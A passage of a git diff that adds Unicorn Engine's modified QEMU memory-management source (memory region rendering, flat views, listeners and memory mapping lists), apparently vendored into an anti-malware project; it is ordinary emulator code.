hwaddr offset_in_region; + Int128 remain; + Int128 now; + FlatRange fr; + AddrRange tmp; + + if (!mr->enabled) { + return; + } + + int128_addto(&base, int128_make64(mr->addr)); + readonly |= mr->readonly; + + tmp = addrrange_make(base, mr->size); + + if (!addrrange_intersects(tmp, clip)) { + return; + } + + clip = addrrange_intersection(tmp, clip); + + if (mr->alias) { + int128_subfrom(&base, int128_make64(mr->alias->addr)); + int128_subfrom(&base, int128_make64(mr->alias_offset)); + render_memory_region(view, mr->alias, base, clip, readonly); + return; + } + + /* Render subregions in priority order. 
*/ + QTAILQ_FOREACH(subregion, &mr->subregions, subregions_link) { + render_memory_region(view, subregion, base, clip, readonly); + } + + if (!mr->terminates) { + return; + } + + offset_in_region = int128_get64(int128_sub(clip.start, base)); + base = clip.start; + remain = clip.size; + + fr.mr = mr; + fr.dirty_log_mask = mr->dirty_log_mask; + fr.romd_mode = mr->romd_mode; + fr.readonly = readonly; + + /* Render the region itself into any gaps left by the current view. */ + for (i = 0; i < view->nr && int128_nz(remain); ++i) { + if (int128_ge(base, addrrange_end(view->ranges[i].addr))) { + continue; + } + if (int128_lt(base, view->ranges[i].addr.start)) { + now = int128_min(remain, + int128_sub(view->ranges[i].addr.start, base)); + fr.offset_in_region = offset_in_region; + fr.addr = addrrange_make(base, now); + flatview_insert(view, i, &fr); + ++i; + int128_addto(&base, now); + offset_in_region += int128_get64(now); + int128_subfrom(&remain, now); + } + now = int128_sub(int128_min(int128_add(base, remain), + addrrange_end(view->ranges[i].addr)), + base); + int128_addto(&base, now); + offset_in_region += int128_get64(now); + int128_subfrom(&remain, now); + } + if (int128_nz(remain)) { + fr.offset_in_region = offset_in_region; + fr.addr = addrrange_make(base, remain); + flatview_insert(view, i, &fr); + } +} + +/* Render a memory topology into a list of disjoint absolute ranges. 
*/ +static FlatView *generate_memory_topology(MemoryRegion *mr) +{ + FlatView *view; + + view = g_new(FlatView, 1); + flatview_init(view); + + if (mr) { + render_memory_region(view, mr, int128_zero(), + addrrange_make(int128_zero(), int128_2_64()), false); + } + flatview_simplify(view); + + return view; +} + +static FlatView *address_space_get_flatview(AddressSpace *as) +{ + FlatView *view; + + view = as->current_map; + flatview_ref(view); + return view; +} + +static void address_space_update_topology_pass(AddressSpace *as, + const FlatView *old_view, + const FlatView *new_view, + bool adding) +{ + unsigned iold, inew; + FlatRange *frold, *frnew; + struct uc_struct *uc = as->uc; + + /* Generate a symmetric difference of the old and new memory maps. + * Kill ranges in the old map, and instantiate ranges in the new map. + */ + iold = inew = 0; + while (iold < old_view->nr || inew < new_view->nr) { + if (iold < old_view->nr) { + frold = &old_view->ranges[iold]; + } else { + frold = NULL; + } + if (inew < new_view->nr) { + frnew = &new_view->ranges[inew]; + } else { + frnew = NULL; + } + + if (frold + && (!frnew + || int128_lt(frold->addr.start, frnew->addr.start) + || (int128_eq(frold->addr.start, frnew->addr.start) + && !flatrange_equal(frold, frnew)))) { + /* In old but not in new, or in both but attributes changed. 
*/ + + if (!adding) { + MEMORY_LISTENER_UPDATE_REGION(frold, as, Reverse, region_del); + } + + ++iold; + } else if (frold && frnew && flatrange_equal(frold, frnew)) { + /* In both and unchanged (except logging may have changed) */ + + if (adding) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop); + if (frold->dirty_log_mask && !frnew->dirty_log_mask) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Reverse, log_stop); + } else if (frnew->dirty_log_mask && !frold->dirty_log_mask) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start); + } + } + + ++iold; + ++inew; + } else { + /* In new */ + + if (adding) { + MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_add); + } + + ++inew; + } + } +} + + +static void address_space_update_topology(AddressSpace *as) +{ + FlatView *old_view = address_space_get_flatview(as); + FlatView *new_view = generate_memory_topology(as->root); + + address_space_update_topology_pass(as, old_view, new_view, false); + address_space_update_topology_pass(as, old_view, new_view, true); + + flatview_unref(as->current_map); + as->current_map = new_view; + + /* Note that all the old MemoryRegions are still alive up to this + * point. This relieves most MemoryListeners from the need to + * ref/unref the MemoryRegions they get---unless they use them + * outside the iothread mutex, in which case precise reference + * counting is necessary. 
+ */ + flatview_unref(old_view); +} + +void memory_region_transaction_begin(struct uc_struct *uc) +{ + ++uc->memory_region_transaction_depth; +} + +static void memory_region_clear_pending(struct uc_struct *uc) +{ + uc->memory_region_update_pending = false; +} + +void memory_region_transaction_commit(struct uc_struct *uc) +{ + AddressSpace *as; + + assert(uc->memory_region_transaction_depth); + --uc->memory_region_transaction_depth; + if (!uc->memory_region_transaction_depth) { + if (uc->memory_region_update_pending) { + MEMORY_LISTENER_CALL_GLOBAL(begin, Forward); + + QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { + address_space_update_topology(as); + } + + MEMORY_LISTENER_CALL_GLOBAL(commit, Forward); + } + memory_region_clear_pending(uc); + } +} + +static void memory_region_destructor_none(MemoryRegion *mr) +{ +} + +static void memory_region_destructor_ram(MemoryRegion *mr) +{ + qemu_ram_free(mr->uc, mr->ram_addr); +} + +static void memory_region_destructor_alias(MemoryRegion *mr) +{ + memory_region_unref(mr->alias); +} + +static void memory_region_destructor_ram_from_ptr(MemoryRegion *mr) +{ + qemu_ram_free_from_ptr(mr->uc, mr->ram_addr); +} + +static bool memory_region_need_escape(char c) +{ + return c == '/' || c == '[' || c == '\\' || c == ']'; +} + +static char *memory_region_escape_name(const char *name) +{ + const char *p; + char *escaped, *q; + uint8_t c; + size_t bytes = 0; + + for (p = name; *p; p++) { + bytes += memory_region_need_escape(*p) ? 
4 : 1; + } + if (bytes == p - name) { + return g_memdup(name, bytes + 1); + } + + escaped = g_malloc(bytes + 1); + for (p = name, q = escaped; *p; p++) { + c = *p; + if (unlikely(memory_region_need_escape(c))) { + *q++ = '\\'; + *q++ = 'x'; + *q++ = "0123456789abcdef"[c >> 4]; + c = "0123456789abcdef"[c & 15]; + } + *q++ = c; + } + *q = 0; + return escaped; +} + +void memory_region_init(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size) +{ + if (!owner) { + owner = qdev_get_machine(uc); + uc->owner = owner; + } + + object_initialize(uc, mr, sizeof(*mr), TYPE_MEMORY_REGION); + mr->uc = uc; + mr->size = int128_make64(size); + if (size == UINT64_MAX) { + mr->size = int128_2_64(); + } + mr->name = g_strdup(name); + + if (name) { + char *escaped_name = memory_region_escape_name(name); + char *name_array = g_strdup_printf("%s[*]", escaped_name); + object_property_add_child(owner, name_array, OBJECT(mr), &error_abort); + object_unref(uc, OBJECT(mr)); + g_free(name_array); + g_free(escaped_name); + } +} + +static void memory_region_get_addr(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + uint64_t value = mr->addr; + + visit_type_uint64(v, &value, name, errp); +} + +static void memory_region_get_container(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + gchar *path = (gchar *)""; + + if (mr->container) { + path = object_get_canonical_path(OBJECT(mr->container)); + } + visit_type_str(v, &path, name, errp); + if (mr->container) { + g_free(path); + } +} + +static Object *memory_region_resolve_container(struct uc_struct *uc, Object *obj, void *opaque, + const char *part) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + return OBJECT(mr->container); +} + +static void memory_region_get_priority(struct uc_struct *uc, Object *obj, Visitor *v, void 
*opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + int32_t value = mr->priority; + + visit_type_int32(v, &value, name, errp); +} + +static bool memory_region_get_may_overlap(struct uc_struct *uc, Object *obj, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + return mr->may_overlap; +} + +static void memory_region_get_size(struct uc_struct *uc, Object *obj, Visitor *v, void *opaque, + const char *name, Error **errp) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + uint64_t value = memory_region_size(mr); + + visit_type_uint64(v, &value, name, errp); +} + +static void memory_region_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + ObjectProperty *op; + + mr->ops = &unassigned_mem_ops; + mr->enabled = true; + mr->romd_mode = true; + mr->destructor = memory_region_destructor_none; + QTAILQ_INIT(&mr->subregions); + + op = object_property_add(OBJECT(mr), "container", + "link<" TYPE_MEMORY_REGION ">", + memory_region_get_container, + NULL, /* memory_region_set_container */ + NULL, NULL, &error_abort); + op->resolve = memory_region_resolve_container; + + object_property_add(OBJECT(mr), "addr", "uint64", + memory_region_get_addr, + NULL, /* memory_region_set_addr */ + NULL, NULL, &error_abort); + object_property_add(OBJECT(mr), "priority", "uint32", + memory_region_get_priority, + NULL, /* memory_region_set_priority */ + NULL, NULL, &error_abort); + object_property_add_bool(mr->uc, OBJECT(mr), "may-overlap", + memory_region_get_may_overlap, + NULL, /* memory_region_set_may_overlap */ + &error_abort); + object_property_add(OBJECT(mr), "size", "uint64", + memory_region_get_size, + NULL, /* memory_region_set_size, */ + NULL, NULL, &error_abort); +} + +static uint64_t unassigned_mem_read(struct uc_struct* uc, hwaddr addr, unsigned size) +{ +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem read " TARGET_FMT_plx "\n", addr); +#endif + if (uc->current_cpu != NULL) { + 
cpu_unassigned_access(uc->current_cpu, addr, false, false, 0, size); + } + return 0; +} + +static void unassigned_mem_write(struct uc_struct* uc, hwaddr addr, + uint64_t val, unsigned size) +{ +#ifdef DEBUG_UNASSIGNED + printf("Unassigned mem write " TARGET_FMT_plx " = 0x%"PRIx64"\n", addr, val); +#endif + if (uc->current_cpu != NULL) { + cpu_unassigned_access(uc->current_cpu, addr, true, false, 0, size); + } +} + +static bool unassigned_mem_accepts(void *opaque, hwaddr addr, + unsigned size, bool is_write) +{ + return false; +} + +const MemoryRegionOps unassigned_mem_ops = { + NULL, + NULL, + + DEVICE_NATIVE_ENDIAN, + + {0,0,false,unassigned_mem_accepts}, +}; + +bool memory_region_access_valid(MemoryRegion *mr, + hwaddr addr, + unsigned size, + bool is_write) +{ + int access_size_min, access_size_max; + int access_size, i; + + if (!mr->ops->valid.unaligned && (addr & (size - 1))) { + return false; + } + + if (!mr->ops->valid.accepts) { + return true; + } + + access_size_min = mr->ops->valid.min_access_size; + if (!mr->ops->valid.min_access_size) { + access_size_min = 1; + } + + access_size_max = mr->ops->valid.max_access_size; + if (!mr->ops->valid.max_access_size) { + access_size_max = 4; + } + + access_size = MAX(MIN(size, access_size_max), access_size_min); + for (i = 0; i < size; i += access_size) { + if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size, + is_write)) { + return false; + } + } + + return true; +} + +static uint64_t memory_region_dispatch_read1(MemoryRegion *mr, + hwaddr addr, + unsigned size) +{ + uint64_t data = 0; + + if (mr->ops->read) { + access_with_adjusted_size(addr, &data, size, + mr->ops->impl.min_access_size, + mr->ops->impl.max_access_size, + memory_region_read_accessor, mr); + } else { + access_with_adjusted_size(addr, &data, size, 1, 4, + memory_region_oldmmio_read_accessor, mr); + } + + return data; +} + +static bool memory_region_dispatch_read(MemoryRegion *mr, + hwaddr addr, + uint64_t *pval, + unsigned size) +{ + if 
(!memory_region_access_valid(mr, addr, size, false)) { + *pval = unassigned_mem_read(mr->uc, addr, size); + return true; + } + + *pval = memory_region_dispatch_read1(mr, addr, size); + adjust_endianness(mr, pval, size); + return false; +} + +static bool memory_region_dispatch_write(MemoryRegion *mr, + hwaddr addr, + uint64_t data, + unsigned size) +{ + if (!memory_region_access_valid(mr, addr, size, true)) { + unassigned_mem_write(mr->uc, addr, data, size); + return true; + } + + adjust_endianness(mr, &data, size); + + if (mr->ops->write) { + access_with_adjusted_size(addr, &data, size, + mr->ops->impl.min_access_size, + mr->ops->impl.max_access_size, + memory_region_write_accessor, mr); + } else { + access_with_adjusted_size(addr, &data, size, 1, 4, + memory_region_oldmmio_write_accessor, mr); + } + return false; +} + +void memory_region_init_io(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const MemoryRegionOps *ops, + void *opaque, + const char *name, + uint64_t size) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ops = ops; + mr->opaque = opaque; + mr->terminates = true; + mr->ram_addr = ~(ram_addr_t)0; +} + +void memory_region_init_ram(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size, + uint32_t perms, + Error **errp) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ram = true; + if (!(perms & UC_PROT_WRITE)) { + mr->readonly = true; + } + mr->perms = perms; + mr->terminates = true; + mr->destructor = memory_region_destructor_ram; + mr->ram_addr = qemu_ram_alloc(size, mr, errp); +} + +void memory_region_init_ram_ptr(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size, + void *ptr) +{ + memory_region_init(uc, mr, owner, name, size); + mr->ram = true; + mr->terminates = true; + mr->destructor = memory_region_destructor_ram_from_ptr; + + /* qemu_ram_alloc_from_ptr cannot fail with ptr != NULL. 
*/ + assert(ptr != NULL); + mr->ram_addr = qemu_ram_alloc_from_ptr(size, ptr, mr, &error_abort); +} + +void memory_region_set_skip_dump(MemoryRegion *mr) +{ + mr->skip_dump = true; +} + +void memory_region_init_alias(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + MemoryRegion *orig, + hwaddr offset, + uint64_t size) +{ + memory_region_init(uc, mr, owner, name, size); + memory_region_ref(orig); + mr->destructor = memory_region_destructor_alias; + mr->alias = orig; + mr->alias_offset = offset; +} + +void memory_region_init_reservation(struct uc_struct *uc, MemoryRegion *mr, + Object *owner, + const char *name, + uint64_t size) +{ + memory_region_init_io(uc, mr, owner, &unassigned_mem_ops, mr, name, size); +} + +static void memory_region_finalize(struct uc_struct *uc, Object *obj, void *opaque) +{ + MemoryRegion *mr = MEMORY_REGION(uc, obj); + + assert(QTAILQ_EMPTY(&mr->subregions)); + // assert(memory_region_transaction_depth == 0); + mr->destructor(mr); + g_free((char *)mr->name); +} + +void memory_region_ref(MemoryRegion *mr) +{ + /* MMIO callbacks most likely will access data that belongs + * to the owner, hence the need to ref/unref the owner whenever + * the memory region is in use. + * + * The memory region is a child of its owner. As long as the + * owner doesn't call unparent itself on the memory region, + * ref-ing the owner will also keep the memory region alive. + * Memory regions without an owner are supposed to never go away, + * but we still ref/unref them for debugging purposes. 
+ */ + Object *obj = OBJECT(mr); + if (obj && obj->parent) { + object_ref(obj->parent); + } else { + object_ref(obj); + } +} + +void memory_region_unref(MemoryRegion *mr) +{ + Object *obj = OBJECT(mr); + if (obj && obj->parent) { + object_unref(mr->uc, obj->parent); + } else { + object_unref(mr->uc, obj); + } +} + +uint64_t memory_region_size(MemoryRegion *mr) +{ + if (int128_eq(mr->size, int128_2_64())) { + return UINT64_MAX; + } + return int128_get64(mr->size); +} + +const char *memory_region_name(const MemoryRegion *mr) +{ + if (!mr->name) { + ((MemoryRegion *)mr)->name = + object_get_canonical_path_component(OBJECT(mr)); + } + return mr->name; +} + +bool memory_region_is_ram(MemoryRegion *mr) +{ + return mr->ram; +} + +bool memory_region_is_skip_dump(MemoryRegion *mr) +{ + return mr->skip_dump; +} + +bool memory_region_is_logging(MemoryRegion *mr) +{ + return mr->dirty_log_mask; +} + +bool memory_region_is_rom(MemoryRegion *mr) +{ + return mr->ram && mr->readonly; +} + +bool memory_region_is_iommu(MemoryRegion *mr) +{ + return mr->iommu_ops != 0; +} + +void memory_region_set_readonly(MemoryRegion *mr, bool readonly) +{ + if (mr->readonly != readonly) { + memory_region_transaction_begin(mr->uc); + mr->readonly = readonly; + if (readonly) { + mr->perms &= ~UC_PROT_WRITE; + } + else { + mr->perms |= UC_PROT_WRITE; + } + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); + } +} + +void memory_region_rom_device_set_romd(MemoryRegion *mr, bool romd_mode) +{ + if (mr->romd_mode != romd_mode) { + memory_region_transaction_begin(mr->uc); + mr->romd_mode = romd_mode; + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); + } +} + +int memory_region_get_fd(MemoryRegion *mr) +{ + if (mr->alias) { + return memory_region_get_fd(mr->alias); + } + + assert(mr->terminates); + + return qemu_get_ram_fd(mr->uc, mr->ram_addr & TARGET_PAGE_MASK); +} + +void 
*memory_region_get_ram_ptr(MemoryRegion *mr) +{ + if (mr->alias) { + return (char*)memory_region_get_ram_ptr(mr->alias) + mr->alias_offset; + } + + assert(mr->terminates); + + return qemu_get_ram_ptr(mr->uc, mr->ram_addr & TARGET_PAGE_MASK); +} + +static void memory_region_update_container_subregions(MemoryRegion *subregion) +{ + hwaddr offset = subregion->addr; + MemoryRegion *mr = subregion->container; + MemoryRegion *other; + + memory_region_transaction_begin(mr->uc); + + memory_region_ref(subregion); + QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { + if (subregion->may_overlap || other->may_overlap) { + continue; + } + if (int128_ge(int128_make64(offset), + int128_add(int128_make64(other->addr), other->size)) + || int128_le(int128_add(int128_make64(offset), subregion->size), + int128_make64(other->addr))) { + continue; + } +#if 0 + printf("warning: subregion collision %llx/%llx (%s) " + "vs %llx/%llx (%s)\n", + (unsigned long long)offset, + (unsigned long long)int128_get64(subregion->size), + subregion->name, + (unsigned long long)other->addr, + (unsigned long long)int128_get64(other->size), + other->name); +#endif + } + QTAILQ_FOREACH(other, &mr->subregions, subregions_link) { + if (subregion->priority >= other->priority) { + QTAILQ_INSERT_BEFORE(other, subregion, subregions_link); + goto done; + } + } + QTAILQ_INSERT_TAIL(&mr->subregions, subregion, subregions_link); +done: + mr->uc->memory_region_update_pending |= mr->enabled && subregion->enabled; + memory_region_transaction_commit(mr->uc); +} + +static void memory_region_add_subregion_common(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion) +{ + assert(!subregion->container); + subregion->container = mr; + subregion->addr = offset; + subregion->end = offset + int128_get64(subregion->size); + memory_region_update_container_subregions(subregion); +} + +void memory_region_add_subregion(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion) +{ + subregion->may_overlap = false; + 
subregion->priority = 0; + memory_region_add_subregion_common(mr, offset, subregion); +} + +void memory_region_add_subregion_overlap(MemoryRegion *mr, + hwaddr offset, + MemoryRegion *subregion, + int priority) +{ + subregion->may_overlap = true; + subregion->priority = priority; + memory_region_add_subregion_common(mr, offset, subregion); +} + +void memory_region_del_subregion(MemoryRegion *mr, + MemoryRegion *subregion) +{ + memory_region_transaction_begin(mr->uc); + assert(subregion->container == mr); + subregion->container = NULL; + QTAILQ_REMOVE(&mr->subregions, subregion, subregions_link); + memory_region_unref(subregion); + mr->uc->memory_region_update_pending |= mr->enabled && subregion->enabled; + memory_region_transaction_commit(mr->uc); +} + +void memory_region_set_enabled(MemoryRegion *mr, bool enabled) +{ + if (enabled == mr->enabled) { + return; + } + memory_region_transaction_begin(mr->uc); + mr->enabled = enabled; + mr->uc->memory_region_update_pending = true; + memory_region_transaction_commit(mr->uc); +} + +static void memory_region_readd_subregion(MemoryRegion *mr) +{ + MemoryRegion *container = mr->container; + + if (container) { + memory_region_transaction_begin(mr->uc); + memory_region_ref(mr); + memory_region_del_subregion(container, mr); + mr->container = container; + memory_region_update_container_subregions(mr); + memory_region_unref(mr); + memory_region_transaction_commit(mr->uc); + } +} + +void memory_region_set_address(MemoryRegion *mr, hwaddr addr) +{ + if (addr != mr->addr) { + mr->addr = addr; + memory_region_readd_subregion(mr); + } +} + +void memory_region_set_alias_offset(MemoryRegion *mr, hwaddr offset) +{ + assert(mr->alias); + + if (offset == mr->alias_offset) { + return; + } + + memory_region_transaction_begin(mr->uc); + mr->alias_offset = offset; + mr->uc->memory_region_update_pending |= mr->enabled; + memory_region_transaction_commit(mr->uc); +} + +ram_addr_t memory_region_get_ram_addr(MemoryRegion *mr) +{ + return 
mr->ram_addr; +} + +uint64_t memory_region_get_alignment(const MemoryRegion *mr) +{ + return mr->align; +} + +static int cmp_flatrange_addr(const void *addr_, const void *fr_) +{ + const AddrRange *addr = addr_; + const FlatRange *fr = fr_; + + if (int128_le(addrrange_end(*addr), fr->addr.start)) { + return -1; + } else if (int128_ge(addr->start, addrrange_end(fr->addr))) { + return 1; + } + return 0; +} + +static FlatRange *flatview_lookup(FlatView *view, AddrRange addr) +{ + return bsearch(&addr, view->ranges, view->nr, + sizeof(FlatRange), cmp_flatrange_addr); +} + +bool memory_region_present(MemoryRegion *container, hwaddr addr) +{ + MemoryRegion *mr = memory_region_find(container, addr, 1).mr; + if (!mr || (mr == container)) { + return false; + } + memory_region_unref(mr); + return true; +} + +bool memory_region_is_mapped(MemoryRegion *mr) +{ + return mr->container ? true : false; +} + +MemoryRegionSection memory_region_find(MemoryRegion *mr, + hwaddr addr, uint64_t size) +{ + MemoryRegionSection ret = { NULL }; + MemoryRegion *root; + AddressSpace *as; + AddrRange range; + FlatView *view; + FlatRange *fr; + + addr += mr->addr; + for (root = mr; root->container; ) { + root = root->container; + addr += root->addr; + } + + as = memory_region_to_address_space(root); + if (!as) { + return ret; + } + range = addrrange_make(int128_make64(addr), int128_make64(size)); + + view = address_space_get_flatview(as); + fr = flatview_lookup(view, range); + if (!fr) { + flatview_unref(view); + return ret; + } + + while (fr > view->ranges && addrrange_intersects(fr[-1].addr, range)) { + --fr; + } + + ret.mr = fr->mr; + ret.address_space = as; + range = addrrange_intersection(range, fr->addr); + ret.offset_within_region = fr->offset_in_region; + ret.offset_within_region += int128_get64(int128_sub(range.start, + fr->addr.start)); + ret.size = range.size; + ret.offset_within_address_space = int128_get64(range.start); + ret.readonly = fr->readonly; + memory_region_ref(ret.mr); + + 
flatview_unref(view); + return ret; +} + +static void listener_add_address_space(MemoryListener *listener, + AddressSpace *as) +{ + FlatView *view; + FlatRange *fr; + + if (listener->address_space_filter + && listener->address_space_filter != as) { + return; + } + + if (listener->address_space_filter->uc->global_dirty_log) { + if (listener->log_global_start) { + listener->log_global_start(listener); + } + } + + view = address_space_get_flatview(as); + FOR_EACH_FLAT_RANGE(fr, view) { + MemoryRegionSection section = MemoryRegionSection_make( + fr->mr, + as, + fr->offset_in_region, + fr->addr.size, + int128_get64(fr->addr.start), + fr->readonly); + if (listener->region_add) { + listener->region_add(listener, §ion); + } + } + flatview_unref(view); +} + +void memory_listener_register(struct uc_struct* uc, MemoryListener *listener, AddressSpace *filter) +{ + MemoryListener *other = NULL; + AddressSpace *as; + + listener->address_space_filter = filter; + if (QTAILQ_EMPTY(&uc->memory_listeners) + || listener->priority >= QTAILQ_LAST(&uc->memory_listeners, + memory_listeners)->priority) { + QTAILQ_INSERT_TAIL(&uc->memory_listeners, listener, link); + } else { + QTAILQ_FOREACH(other, &uc->memory_listeners, link) { + if (listener->priority < other->priority) { + break; + } + } + QTAILQ_INSERT_BEFORE(other, listener, link); + } + + QTAILQ_FOREACH(as, &uc->address_spaces, address_spaces_link) { + listener_add_address_space(listener, as); + } +} + +void memory_listener_unregister(struct uc_struct *uc, MemoryListener *listener) +{ + QTAILQ_REMOVE(&uc->memory_listeners, listener, link); +} + +void address_space_init(struct uc_struct *uc, AddressSpace *as, MemoryRegion *root, const char *name) +{ + if (QTAILQ_EMPTY(&uc->address_spaces)) { + memory_init(uc); + } + + memory_region_transaction_begin(uc); + as->uc = uc; + as->root = root; + as->current_map = g_new(FlatView, 1); + flatview_init(as->current_map); + QTAILQ_INSERT_TAIL(&uc->address_spaces, as, address_spaces_link); + 
as->name = g_strdup(name ? name : "anonymous"); + address_space_init_dispatch(as); + uc->memory_region_update_pending |= root->enabled; + memory_region_transaction_commit(uc); +} + +void address_space_destroy(AddressSpace *as) +{ + MemoryListener *listener; + + /* Flush out anything from MemoryListeners listening in on this */ + memory_region_transaction_begin(as->uc); + as->root = NULL; + memory_region_transaction_commit(as->uc); + QTAILQ_REMOVE(&as->uc->address_spaces, as, address_spaces_link); + address_space_unregister(as); + + address_space_destroy_dispatch(as); + + // TODO(danghvu): why assert fail here? + QTAILQ_FOREACH(listener, &as->uc->memory_listeners, link) { + // assert(listener->address_space_filter != as); + } + + flatview_unref(as->current_map); + g_free(as->name); +} + +bool io_mem_read(MemoryRegion *mr, hwaddr addr, uint64_t *pval, unsigned size) +{ + return memory_region_dispatch_read(mr, addr, pval, size); +} + +bool io_mem_write(MemoryRegion *mr, hwaddr addr, + uint64_t val, unsigned size) +{ + return memory_region_dispatch_write(mr, addr, val, size); +} + +typedef struct MemoryRegionList MemoryRegionList; + +struct MemoryRegionList { + const MemoryRegion *mr; + QTAILQ_ENTRY(MemoryRegionList) queue; +}; + +typedef QTAILQ_HEAD(queue, MemoryRegionList) MemoryRegionListHead; + +static const TypeInfo memory_region_info = { + TYPE_MEMORY_REGION, + TYPE_OBJECT, + + 0, + sizeof(MemoryRegion), + NULL, + + memory_region_initfn, + NULL, + memory_region_finalize, +}; + +void memory_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &memory_region_info); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c b/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c new file mode 100644 index 0000000..324daa8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/memory_mapping.c @@ -0,0 +1,266 @@ +/* + * QEMU memory mapping + * + * Copyright Fujitsu, Corp. 
2011, 2012 + * + * Authors: + * Wen Congyang + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "glib_compat.h" + +#include "cpu.h" +#include "exec/cpu-all.h" +#include "sysemu/memory_mapping.h" +#include "exec/memory.h" +#include "exec/address-spaces.h" + +#include "uc_priv.h" + +//#define DEBUG_GUEST_PHYS_REGION_ADD + +static void memory_mapping_list_add_mapping_sorted(MemoryMappingList *list, + MemoryMapping *mapping) +{ + MemoryMapping *p; + + QTAILQ_FOREACH(p, &list->head, next) { + if (p->phys_addr >= mapping->phys_addr) { + QTAILQ_INSERT_BEFORE(p, mapping, next); + return; + } + } + QTAILQ_INSERT_TAIL(&list->head, mapping, next); +} + +static void create_new_memory_mapping(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length) +{ + MemoryMapping *memory_mapping; + + memory_mapping = g_malloc(sizeof(MemoryMapping)); + memory_mapping->phys_addr = phys_addr; + memory_mapping->virt_addr = virt_addr; + memory_mapping->length = length; + list->last_mapping = memory_mapping; + list->num++; + memory_mapping_list_add_mapping_sorted(list, memory_mapping); +} + +static inline bool mapping_contiguous(MemoryMapping *map, + hwaddr phys_addr, + hwaddr virt_addr) +{ + return phys_addr == map->phys_addr + map->length && + virt_addr == map->virt_addr + map->length; +} + +/* + * [map->phys_addr, map->phys_addr + map->length) and + * [phys_addr, phys_addr + length) have intersection? + */ +static inline bool mapping_have_same_region(MemoryMapping *map, + hwaddr phys_addr, + ram_addr_t length) +{ + return !(phys_addr + length < map->phys_addr || + phys_addr >= map->phys_addr + map->length); +} + +/* + * [map->phys_addr, map->phys_addr + map->length) and + * [phys_addr, phys_addr + length) have intersection. The virtual address in the + * intersection are the same? 
+ */ +static inline bool mapping_conflict(MemoryMapping *map, + hwaddr phys_addr, + hwaddr virt_addr) +{ + return virt_addr - map->virt_addr != phys_addr - map->phys_addr; +} + +/* + * [map->virt_addr, map->virt_addr + map->length) and + * [virt_addr, virt_addr + length) have intersection. And the physical address + * in the intersection are the same. + */ +static inline void mapping_merge(MemoryMapping *map, + hwaddr virt_addr, + ram_addr_t length) +{ + if (virt_addr < map->virt_addr) { + map->length += map->virt_addr - virt_addr; + map->virt_addr = virt_addr; + } + + if ((virt_addr + length) > + (map->virt_addr + map->length)) { + map->length = virt_addr + length - map->virt_addr; + } +} + +void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, + hwaddr phys_addr, + hwaddr virt_addr, + ram_addr_t length) +{ + MemoryMapping *memory_mapping, *last_mapping; + + if (QTAILQ_EMPTY(&list->head)) { + create_new_memory_mapping(list, phys_addr, virt_addr, length); + return; + } + + last_mapping = list->last_mapping; + if (last_mapping) { + if (mapping_contiguous(last_mapping, phys_addr, virt_addr)) { + last_mapping->length += length; + return; + } + } + + QTAILQ_FOREACH(memory_mapping, &list->head, next) { + if (mapping_contiguous(memory_mapping, phys_addr, virt_addr)) { + memory_mapping->length += length; + list->last_mapping = memory_mapping; + return; + } + + if (phys_addr + length < memory_mapping->phys_addr) { + /* create a new region before memory_mapping */ + break; + } + + if (mapping_have_same_region(memory_mapping, phys_addr, length)) { + if (mapping_conflict(memory_mapping, phys_addr, virt_addr)) { + continue; + } + + /* merge this region into memory_mapping */ + mapping_merge(memory_mapping, virt_addr, length); + list->last_mapping = memory_mapping; + return; + } + } + + /* this region can not be merged into any existed memory mapping. 
